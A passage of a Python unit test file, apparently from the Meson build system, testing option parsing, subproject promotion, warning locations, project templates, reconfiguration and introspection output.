tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('102 subdir parse error', os.path.join('subdir', 'meson.build')),
('103 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
if not is_windows():
try:
env.detect_rust_compiler(MachineChoice.HOST)
langs.append('rust')
except EnvironmentException:
pass
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp', 'd'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
elif lang in ('java'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'Foo.' + lang), 'w') as f:
f.write('public class Foo { public static void main() {} }')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
https://github.com/mesonbuild/meson/issues/2865
(That an error is raised on OSX is exercised by test failing/78)
"""
tdir = os.path.join(self.unit_test_dir, '30 shared_mod linking')
out = self.init(tdir)
msg = ('''WARNING: target links against shared modules. This is not
recommended as it is not supported on some platforms''')
self.assertIn(msg, out)
def test_ndebug_if_release_disabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=release', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=1', subprocess.check_output(exe).strip())
def test_ndebug_if_release_enabled(self):
testdir = os.path.join(self.unit_test_dir, '28 ndebug if-release')
self.init(testdir, extra_args=['--buildtype=debugoptimized', '-Db_ndebug=if-release'])
self.build()
exe = os.path.join(self.builddir, 'main')
self.assertEqual(b'NDEBUG=0', subprocess.check_output(exe).strip())
def test_guessed_linker_dependencies(self):
'''
Test that meson adds dependencies for libraries based on the final
linker command line.
'''
testdirbase = os.path.join(self.unit_test_dir, '29 guessed linker dependencies')
testdirlib = os.path.join(testdirbase, 'lib')
extra_args = None
libdir_flags = ['-L']
env = get_fake_env(testdirlib, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() in {'msvc', 'clang-cl', 'intel-cl'}:
# msvc-like compiler, also test it with msvc-specific flags
libdir_flags += ['/LIBPATH:', '-LIBPATH:']
else:
# static libraries are not linkable with -l with msvc because meson installs them
# as .a files which unix_args_to_native will not know as it expects libraries to use
# .lib as extension. For a DLL the import library is installed as .lib. Thus for msvc
# this tests needs to use shared libraries to test the path resolving logic in the
# dependency generation code path.
extra_args = ['--default-library', 'static']
initial_builddir = self.builddir
initial_installdir = self.installdir
for libdir_flag in libdir_flags:
# build library
self.new_builddir()
self.init(testdirlib, extra_args=extra_args)
self.build()
self.install()
libbuilddir = self.builddir
installdir = self.installdir
libdir = os.path.join(self.installdir, self.prefix.lstrip('/').lstrip('\\'), 'lib')
# build user of library
self.new_builddir()
# replace is needed because meson mangles platform paths passed via LDFLAGS
self.init(os.path.join(testdirbase, 'exe'),
override_envvars={"LDFLAGS": '{}{}'.format(libdir_flag, libdir.replace('\\', '/'))})
self.build()
self.assertBuildIsNoop()
# rebuild library
exebuilddir = self.builddir
self.installdir = installdir
self.builddir = libbuilddir
# Microsoft's compiler is quite smart about touching import libs on changes,
# so ensure that there is actually a change in symbols.
self.setconf('-Dmore_exports=true')
self.build()
self.install()
# no ensure_backend_detects_changes needed because self.setconf did that already
# assert user of library will be rebuild
self.builddir = exebuilddir
self.assertRebuiltTarget('app')
# restore dirs for the next test case
self.installdir = initial_builddir
self.builddir = initial_installdir
def test_conflicting_d_dash_option(self):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
with self.assertRaises(subprocess.CalledProcessError) as e:
self.init(testdir, extra_args=['-Dbindir=foo', '--bindir=bar'])
# Just to ensure that we caught the correct error
self.assertIn('passed as both', e.stderr)
def _test_same_option_twice(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir, extra_args=args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice(self):
self._test_same_option_twice('bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice(self):
self._test_same_option_twice('bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice(self):
self._test_same_option_twice('one', ['-Done=foo', '-Done=bar'])
def _test_same_option_twice_configure(self, arg, args):
testdir = os.path.join(self.unit_test_dir, '37 mixed command line args')
self.init(testdir)
self.setconf(args)
opts = self.introspect('--buildoptions')
for item in opts:
if item['name'] == arg:
self.assertEqual(item['value'], 'bar')
return
raise Exception('Missing {} value?'.format(arg))
def test_same_dash_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['--bindir=foo', '--bindir=bar'])
def test_same_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'bindir', ['-Dbindir=foo', '-Dbindir=bar'])
def test_same_project_d_option_twice_configure(self):
self._test_same_option_twice_configure(
'one', ['-Done=foo', '-Done=bar'])
def test_command_line(self):
testdir = os.path.join(self.unit_test_dir, '34 command line')
# Verify default values when passing no args that affect the
# configuration, and as a bonus, test that --profile-self works.
self.init(testdir, extra_args=['--profile-self'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'static')
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.assertEqual(obj.user_options['set_sub_opt'].value, True)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'default3')
self.wipe()
# warning_level is special, it's --warnlevel instead of --warning-level
# for historical reasons
self.init(testdir, extra_args=['--warnlevel=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('--warnlevel=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# But when using -D syntax, it should be 'warning_level'
self.init(testdir, extra_args=['-Dwarning_level=2'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '2')
self.setconf('-Dwarning_level=3')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '3')
self.wipe()
# Mixing --option and -Doption is forbidden
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf(['--warnlevel=1', '-Dwarning_level=3'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('as both', cm.exception.output)
self.wipe()
# --default-library should override default value from project()
self.init(testdir, extra_args=['--default-library=both'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'both')
self.setconf('--default-library=shared')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
if self.backend is Backend.ninja:
# reconfigure target works only with ninja backend
self.build('reconfigure')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['default_library'].value, 'shared')
self.wipe()
# Should warn on unknown options
out = self.init(testdir, extra_args=['-Dbad=1', '-Dfoo=2', '-Dwrong_link_args=foo'])
self.assertIn('Unknown options: "bad, foo, wrong_link_args"', out)
self.wipe()
# Should fail on malformed option
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testdir, extra_args=['-Dfoo'])
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.init(testdir)
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.setconf('-Dfoo')
self.assertNotEqual(0, cm.exception.returncode)
self.assertIn('Option \'foo\' must have a value separated by equals sign.', cm.exception.output)
self.wipe()
# It is not an error to set wrong option for unknown subprojects or
# language because we don't have control on which one will be selected.
self.init(testdir, extra_args=['-Dc_wrong=1', '-Dwrong:bad=1', '-Db_wrong=1'])
self.wipe()
# Test we can set subproject option
self.init(testdir, extra_args=['-Dsubp:subp_opt=foo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['subp:subp_opt'].value, 'foo')
self.wipe()
# c_args value should be parsed with split_args
self.init(testdir, extra_args=['-Dc_args=-Dfoo -Dbar "-Dthird=one two"'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo', '-Dbar', '-Dthird=one two'])
self.setconf('-Dc_args="foo bar" one two')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['foo bar', 'one', 'two'])
self.wipe()
self.init(testdir, extra_args=['-Dset_percent_opt=myoption%'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.user_options['set_percent_opt'].value, 'myoption%')
self.wipe()
# Setting a 2nd time the same option should override the first value
try:
self.init(testdir, extra_args=['--bindir=foo', '--bindir=bar',
'-Dbuildtype=plain', '-Dbuildtype=release',
'-Db_sanitize=address', '-Db_sanitize=thread',
'-Dc_args=-Dfoo', '-Dc_args=-Dbar'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'bar')
self.assertEqual(obj.builtins['buildtype'].value, 'release')
self.assertEqual(obj.base_options['b_sanitize'].value, 'thread')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dbar'])
self.setconf(['--bindir=bar', '--bindir=foo',
'-Dbuildtype=release', '-Dbuildtype=plain',
'-Db_sanitize=thread', '-Db_sanitize=address',
'-Dc_args=-Dbar', '-Dc_args=-Dfoo'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['bindir'].value, 'foo')
self.assertEqual(obj.builtins['buildtype'].value, 'plain')
self.assertEqual(obj.base_options['b_sanitize'].value, 'address')
self.assertEqual(obj.compiler_options.host['c']['args'].value, ['-Dfoo'])
self.wipe()
except KeyError:
# Ignore KeyError, it happens on CI for compilers that does not
# support b_sanitize. We have to test with a base option because
# they used to fail this test with Meson 0.46 an earlier versions.
pass
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
of = open(mfile, 'w')
of.write("project('foobar', 'c')\n")
of.close()
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
# Command-line parsing of buildtype settings should be the same as
# setting with `meson configure`.
#
# Setting buildtype should set optimization/debug
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting optimization/debug should set buildtype
self.new_builddir()
self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting both buildtype and debug on the command-line should work, and
# should warn not to do that. Also test that --debug is parsed as -Ddebug=true
self.new_builddir()
out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = ['{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
with Path(self.builddir):
self.init(testdir, extra_args=['--wipe'])
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
def test_target_construct_id_from_path(self):
# This id is stable but not guessable.
# The test is supposed to prevent unintentional
# changes of target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub_implicit',
'name': 'sub_implicit',
'version': '1.0',
},
{
